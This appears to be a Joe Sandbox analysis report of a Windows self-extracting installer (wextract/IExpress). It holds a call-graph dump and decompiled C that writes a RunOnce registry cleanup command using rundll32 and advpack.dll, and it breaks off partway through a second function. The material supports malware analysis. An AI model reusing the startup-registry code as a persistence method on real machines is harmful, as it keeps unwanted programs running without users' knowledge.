2946 a42256 2945->2946 2947 a4209a 2945->2947 2948 a46ce0 4 API calls 2946->2948 2950 a4171e _vsnprintf 2947->2950 2952 a420dc 2947->2952 2949 a42263 2948->2949 2949->2679 2951 a420af RegQueryValueExA 2950->2951 2951->2947 2951->2952 2953 a420e4 
RegCloseKey 2952->2953 2954 a420fb GetSystemDirectoryA 2952->2954 2953->2946 2955 a4658a CharPrevA 2954->2955 2956 a4211b LoadLibraryA 2955->2956 2957 a4212e GetProcAddress FreeLibrary 2956->2957 2958 a42179 GetModuleFileNameA 2956->2958 2957->2958 2959 a4214e GetSystemDirectoryA 2957->2959 2960 a421de RegCloseKey 2958->2960 2962 a42177 2958->2962 2961 a42165 2959->2961 2959->2962 2960->2946 2963 a4658a CharPrevA 2961->2963 2962->2962 2964 a421b7 LocalAlloc 2962->2964 2963->2962 2965 a421ec 2964->2965 2966 a421cd 2964->2966 2968 a4171e _vsnprintf 2965->2968 2967 a444b9 20 API calls 2966->2967 2967->2960 2969 a42218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2946 2972 a44016 CreateProcessA 2971->2972 2973 a44106 2971->2973 2974 a440c4 2972->2974 2975 a44041 WaitForSingleObject GetExitCodeProcess 2972->2975 2976 a46ce0 4 API calls 2973->2976 2977 a46285 GetLastError 2974->2977 2983 a44070 2975->2983 2978 a44117 2976->2978 2980 a440c9 GetLastError FormatMessageA 2977->2980 2978->2679 2982 a444b9 20 API calls 2980->2982 2981 a44096 CloseHandle CloseHandle 2981->2973 2984 a440ba 2981->2984 2982->2973 3042 a4411b 2983->3042 2984->2973 2986 a464c2 2985->2986 2987 a4658a CharPrevA 2986->2987 2988 a464d8 GetFileAttributesA 2987->2988 2989 a46501 LoadLibraryA 2988->2989 2990 a464ea 2988->2990 2992 a46508 2989->2992 2990->2989 2991 a464ee LoadLibraryExA 2990->2991 2991->2992 2993 a46ce0 4 API calls 2992->2993 2994 a46513 2993->2994 2994->2696 2996 a42289 RegOpenKeyExA 2995->2996 2998 a42381 2995->2998 2996->2998 2999 a422b1 RegQueryValueExA 2996->2999 2997 a46ce0 4 API calls 3000 a4238c 2997->3000 2998->2997 3001 a42374 RegCloseKey 2999->3001 3002 a422e6 memset GetSystemDirectoryA 2999->3002 3000->2674 3001->2998 3003 a42321 3002->3003 3004 a4230f 3002->3004 3006 a4171e _vsnprintf 3003->3006 3005 a4658a CharPrevA 3004->3005 3005->3003 3007 a4233f RegSetValueExA 3006->3007 3007->3001 3010 a41a9a 3009->3010 3012 a41aba 3010->3012 3014 a41aaf 3010->3014 3028 a4667f 
3010->3028 3012->2907 3013 a4667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 a42ad4 GetModuleFileNameA 3015->3016 3019 a42be6 3015->3019 3027 a42b02 3016->3027 3017 a46ce0 4 API calls 3018 a42bf5 3017->3018 3018->2925 3019->3017 3020 a42af1 IsDBCSLeadByte 3020->3027 3021 a42b11 CharNextA CharUpperA 3023 a42b8d CharUpperA 3021->3023 3021->3027 3022 a42bca CharNextA 3024 a42bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 a42b43 CharPrevA 3026->3027 3027->3019 3027->3020 3027->3021 3027->3022 3027->3024 3027->3026 3033 a465e8 3027->3033 3029 a46689 3028->3029 3030 a46648 IsDBCSLeadByte 3029->3030 3031 a46697 CharNextA 3029->3031 3032 a466a5 3029->3032 3030->3029 3031->3029 3032->3010 3034 a465f4 3033->3034 3034->3034 3035 a465fb CharPrevA 3034->3035 3036 a46611 CharPrevA 3035->3036 3037 a4661e 3036->3037 3038 a4660b 3036->3038 3039 a4663d 3037->3039 3040 a46634 CharNextA 3037->3040 3041 a46627 CharPrevA 3037->3041 3038->3036 3038->3037 3039->3027 3040->3039 3041->3039 3041->3040 3043 a44132 3042->3043 3045 a4412a 3042->3045 3046 a41ea7 3043->3046 3045->2981 3047 a41ed3 3046->3047 3048 a41eba 3046->3048 3047->3045 3049 a4256d 15 API calls 3048->3049 3049->3047 3051 a42026 3050->3051 3052 a41ff0 RegOpenKeyExA 3050->3052 3051->2321 3052->3051 3053 a4200f RegDeleteValueA RegCloseKey 3052->3053 3053->3051 3119 a419e0 3120 a41a24 GetDesktopWindow 3119->3120 3121 a41a03 3119->3121 3128 a443d0 6 API calls 3120->3128 3123 a41a20 3121->3123 3125 a41a16 EndDialog 3121->3125 3126 a46ce0 4 API calls 3123->3126 3125->3123 3127 a41a7e 3126->3127 3129 a44463 SetWindowPos 3128->3129 3131 a46ce0 4 API calls 3129->3131 3132 a41a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3123 3133 a46a20 __getmainargs 3134 a46bef _XcptFilter 3135 a469b0 3136 a469b5 3135->3136 3144 a46fbe GetModuleHandleW 3136->3144 3138 a469c1 __set_app_type __p__fmode __p__commode 3139 a469f9 3138->3139 3140 a46a02 __setusermatherr 3139->3140 3141 a46a0e 3139->3141 3140->3141 3146 a471ef 
_controlfp 3141->3146 3143 a46a13 3145 a46fcf 3144->3145 3145->3138 3146->3143 3147 a434f0 3148 a43504 3147->3148 3166 a435b8 3147->3166 3150 a435be GetDesktopWindow 3148->3150 3151 a4351b 3148->3151 3148->3166 3149 a43526 3155 a443d0 11 API calls 3150->3155 3152 a4354f 3151->3152 3153 a4351f 3151->3153 3152->3149 3157 a43559 ResetEvent 3152->3157 3153->3149 3156 a4352d TerminateThread EndDialog 3153->3156 3154 a43671 EndDialog 3154->3149 3158 a435d6 3155->3158 3156->3149 3159 a444b9 20 API calls 3157->3159 3160 a435e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3160 3161 a4361d SetWindowTextA CreateThread 3158->3161 3163 a43581 3159->3163 3160->3161 3161->3149 3162 a43646 3161->3162 3164 a444b9 20 API calls 3162->3164 3165 a4359b SetEvent 3163->3165 3167 a4358a SetEvent 3163->3167 3164->3166 3168 a43680 4 API calls 3165->3168 3166->3149 3166->3154 3167->3149 3168->3166 3169 a46ef0 3170 a46f2d 3169->3170 3172 a46f02 3169->3172 3171 a46f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a47270 _except_handler4_common 3054 a44cc0 GlobalFree 3055 a46f40 SetUnhandledExceptionFilter 3174 a44bc0 3175 a44c05 3174->3175 3177 a44bd7 3174->3177 3176 a44c1b SetFilePointer 3175->3176 3175->3177 3176->3177 3178 a430c0 3179 a430de CallWindowProcA 3178->3179 3180 a430ce 3178->3180 3181 a430da 3179->3181 3180->3179 3180->3181 3182 a463c0 3183 a46407 3182->3183 3184 a4658a CharPrevA 3183->3184 3185 a46415 CreateFileA 3184->3185 3186 a46448 WriteFile 3185->3186 3187 a4643a 3185->3187 3188 a46465 CloseHandle 3186->3188 3189 a46ce0 4 API calls 3187->3189 3188->3187 3191 a4648f 3189->3191 3192 a43100 3193 a431b0 3192->3193 3194 a43111 3192->3194 3195 a431b9 SendDlgItemMessageA 3193->3195 3196 a43141 3193->3196 3198 a43149 GetDesktopWindow 3194->3198 3200 a4311d 3194->3200 3195->3196 3197 a43138 EndDialog 3197->3196 3199 a443d0 11 API calls 3198->3199 3201 a4315d 6 API calls 3199->3201 3200->3196 3200->3197 3201->3196 3202 a44200 3203 a4421e 3202->3203 3204 a4420b 
SendMessageA 3202->3204 3204->3203 3205 a46c03 3206 a46c17 _exit 3205->3206 3207 a46c1e 3205->3207 3206->3207 3208 a46c27 _cexit 3207->3208 3209 a46c32 3207->3209 3208->3209 3056 a44cd0 3057 a44cf4 3056->3057 3058 a44d0b 3056->3058 3059 a44d02 3057->3059 3060 a44b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 a44dcb 3058->3062 3065 a44d25 3058->3065 3061 a46ce0 4 API calls 3059->3061 3060->3059 3064 a44e95 3061->3064 3063 a44dd4 SetDlgItemTextA 3062->3063 3066 a44de3 3062->3066 3063->3066 3065->3059 3079 a44c37 3065->3079 3066->3059 3084 a4476d 3066->3084 3069 a44e38 3069->3059 3071 a44980 25 API calls 3069->3071 3073 a44e56 3071->3073 3072 a44b60 FindCloseChangeNotification 3074 a44d99 SetFileAttributesA 3072->3074 3073->3059 3075 a44e64 3073->3075 3074->3059 3093 a447e0 LocalAlloc 3075->3093 3078 a44e6f 3078->3059 3080 a44c4c DosDateTimeToFileTime 3079->3080 3081 a44c88 3079->3081 3080->3081 3082 a44c5e LocalFileTimeToFileTime 3080->3082 3081->3059 3081->3072 3082->3081 3083 a44c70 SetFileTime 3082->3083 3083->3081 3102 a466ae GetFileAttributesA 3084->3102 3086 a4477b 3086->3069 3087 a447cc SetFileAttributesA 3089 a447db 3087->3089 3089->3069 3090 a46517 24 API calls 3091 a447b1 3090->3091 3091->3087 3091->3089 3092 a447c2 3091->3092 3092->3087 3094 a447f6 3093->3094 3095 a4480f LocalAlloc 3093->3095 3096 a444b9 20 API calls 3094->3096 3098 a44831 3095->3098 3101 a4480b 3095->3101 3096->3101 3099 a444b9 20 API calls 3098->3099 3100 a44846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a44777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a44ad0 3112 a43680 3104->3112 3107 a44aee WriteFile 3109 a44b0f 3107->3109 3110 a44b14 3107->3110 3108 a44ae9 3110->3109 3111 a44b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a43691 MsgWaitForMultipleObjects 3112->3113 3114 a436e8 3113->3114 3115 a436a9 PeekMessageA 3113->3115 3114->3107 3114->3108 3115->3113 3117 a436bc 3115->3117 3116 a436c7 DispatchMessageA 3118 a436d1 PeekMessageA 3116->3118 3117->3113 
3117->3114 3117->3116 3117->3118 3118->3117 3210 a43210 3211 a43227 3210->3211 3212 a4328e EndDialog 3210->3212 3213 a43235 3211->3213 3214 a433e2 GetDesktopWindow 3211->3214 3229 a43239 3212->3229 3218 a4324c 3213->3218 3219 a432dd GetDlgItemTextA 3213->3219 3213->3229 3216 a443d0 11 API calls 3214->3216 3217 a433f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 a4341f GetDlgItem EnableWindow 3217->3220 3217->3229 3222 a432c5 EndDialog 3218->3222 3223 a43251 3218->3223 3221 a43366 3219->3221 3230 a432fc 3219->3230 3220->3229 3225 a444b9 20 API calls 3221->3225 3222->3229 3224 a4325c LoadStringA 3223->3224 3223->3229 3226 a43294 3224->3226 3227 a4327b 3224->3227 3225->3229 3248 a44224 LoadLibraryA 3226->3248 3233 a444b9 20 API calls 3227->3233 3230->3221 3232 a43331 GetFileAttributesA 3230->3232 3235 a4337c 3232->3235 3236 a4333f 3232->3236 3233->3212 3234 a432a5 SetDlgItemTextA 3234->3227 3234->3229 3237 a4658a CharPrevA 3235->3237 3238 a444b9 20 API calls 3236->3238 3239 a4338d 3237->3239 3240 a43351 3238->3240 3242 a458c8 27 API calls 3239->3242 3240->3229 3241 a4335a CreateDirectoryA 3240->3241 3241->3221 3241->3235 3243 a43394 3242->3243 3243->3221 3244 a433a4 3243->3244 3245 a433c7 EndDialog 3244->3245 3246 a4597d 34 API calls 3244->3246 3245->3229 3247 a433c3 3246->3247 3247->3229 3247->3245 3249 a44246 GetProcAddress 3248->3249 3250 a443b2 3248->3250 3251 a443a4 FreeLibrary 3249->3251 3252 a4425d GetProcAddress 3249->3252 3254 a444b9 20 API calls 3250->3254 3251->3250 3252->3251 3253 a44274 GetProcAddress 3252->3253 3253->3251 3255 a4428b 3253->3255 3257 a4329d 3254->3257 3256 a44295 GetTempPathA 3255->3256 3262 a442e1 3255->3262 3258 a442ad 3256->3258 3257->3229 3257->3234 3258->3258 3259 a442b4 CharPrevA 3258->3259 3260 a442d0 CharPrevA 3259->3260 3259->3262 3260->3262 3261 a44390 FreeLibrary 3261->3257 3262->3261 3263 a44a50 3264 a44a66 3263->3264 3265 a44a9f ReadFile 3263->3265 3266 a44a82 memcpy 3264->3266 3267 a44abb 3264->3267 3265->3267 
3266->3267 3268 a43450 3269 a434d3 EndDialog 3268->3269 3270 a4345e 3268->3270 3271 a4346a 3269->3271 3272 a4349a GetDesktopWindow 3270->3272 3276 a43465 3270->3276 3273 a443d0 11 API calls 3272->3273 3274 a434ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a4348c EndDialog 3275->3271 3276->3271 3276->3275

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

C-Code - Quality: 93%
E00A4202A(struct HINSTANCE__* __edx) {
	signed int _v8;
	char _v268;
	char _v528;
	void* _v532;
	int _v536;
	int _v540;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t28;
	long _t36;
	long _t41;
	struct HINSTANCE__* _t46;
	intOrPtr _t49;
	intOrPtr _t50;
	CHAR* _t54;
	void _t56;
	signed int _t66;
	intOrPtr* _t72;
	void* _t73;
	void* _t75;
	void* _t80;
	intOrPtr* _t81;
	void* _t86;
	void* _t87;
	void* _t90;
	_Unknown_base(*)()* _t91;
	signed int _t93;
	void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A46CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A4171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E00A4658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa49a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0xa491e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa491e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0xa48580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E00A4171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E00A4658A( &_v268, 0x104, 0xa41140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0xa48530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a420da
                                                                                                                                                                                                                                            0x00a420e2
                                                                                                                                                                                                                                            0x00a42103
                                                                                                                                                                                                                                            0x00a4210e
                                                                                                                                                                                                                                            0x00a42116
                                                                                                                                                                                                                                            0x00a42122
                                                                                                                                                                                                                                            0x00a42128
                                                                                                                                                                                                                                            0x00a4212c
                                                                                                                                                                                                                                            0x00a42179
                                                                                                                                                                                                                                            0x00a42194
                                                                                                                                                                                                                                            0x00a421de
                                                                                                                                                                                                                                            0x00a421e4
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00a42196
                                                                                                                                                                                                                                            0x00a42196
                                                                                                                                                                                                                                            0x00a4219c
                                                                                                                                                                                                                                            0x00a4219f
                                                                                                                                                                                                                                            0x00a4219f
                                                                                                                                                                                                                                            0x00a421a1
                                                                                                                                                                                                                                            0x00a421a2
                                                                                                                                                                                                                                            0x00a421a6
                                                                                                                                                                                                                                            0x00a421a8
                                                                                                                                                                                                                                            0x00a421b0
                                                                                                                                                                                                                                            0x00a421b0
                                                                                                                                                                                                                                            0x00a421b2
                                                                                                                                                                                                                                            0x00a421b3
                                                                                                                                                                                                                                            0x00a421bc
                                                                                                                                                                                                                                            0x00a421c7
                                                                                                                                                                                                                                            0x00a421cb
                                                                                                                                                                                                                                            0x00a421f1
                                                                                                                                                                                                                                            0x00a421f6
                                                                                                                                                                                                                                            0x00a421fd
                                                                                                                                                                                                                                            0x00a421ff
                                                                                                                                                                                                                                            0x00a421ff
                                                                                                                                                                                                                                            0x00a42204
                                                                                                                                                                                                                                            0x00a42213
                                                                                                                                                                                                                                            0x00a42218
                                                                                                                                                                                                                                            0x00a4221d
                                                                                                                                                                                                                                            0x00a4221d
                                                                                                                                                                                                                                            0x00a42220
                                                                                                                                                                                                                                            0x00a42220
                                                                                                                                                                                                                                            0x00a42222
                                                                                                                                                                                                                                            0x00a42223
                                                                                                                                                                                                                                            0x00a42229
                                                                                                                                                                                                                                            0x00a4223d
                                                                                                                                                                                                                                            0x00a42249
                                                                                                                                                                                                                                            0x00a42250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42250
                                                                                                                                                                                                                                            0x00a421d2
                                                                                                                                                                                                                                            0x00a421d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a421d9
                                                                                                                                                                                                                                            0x00a4213a
                                                                                                                                                                                                                                            0x00a42141
                                                                                                                                                                                                                                            0x00a42144
                                                                                                                                                                                                                                            0x00a4214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42163
                                                                                                                                                                                                                                            0x00a42172
                                                                                                                                                                                                                                            0x00a42172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42163
                                                                                                                                                                                                                                            0x00a420ea
                                                                                                                                                                                                                                            0x00a420f0
                                                                                                                                                                                                                                            0x00000000

APIs
• memset.MSVCRT ref: 00A42050
• memset.MSVCRT ref: 00A4205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A4208C
  • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A420C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A420EA
• GetSystemDirectoryA.KERNEL32 ref: 00A42103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A42134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42144
• GetSystemDirectoryA.KERNEL32 ref: 00A4215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A4218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A421C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A421E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A4223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42250
Strings
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A43BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0xa49124 =  *0xa49124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0xa48a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0xa48c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E00A4468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0xa49124 = 0x80070714;
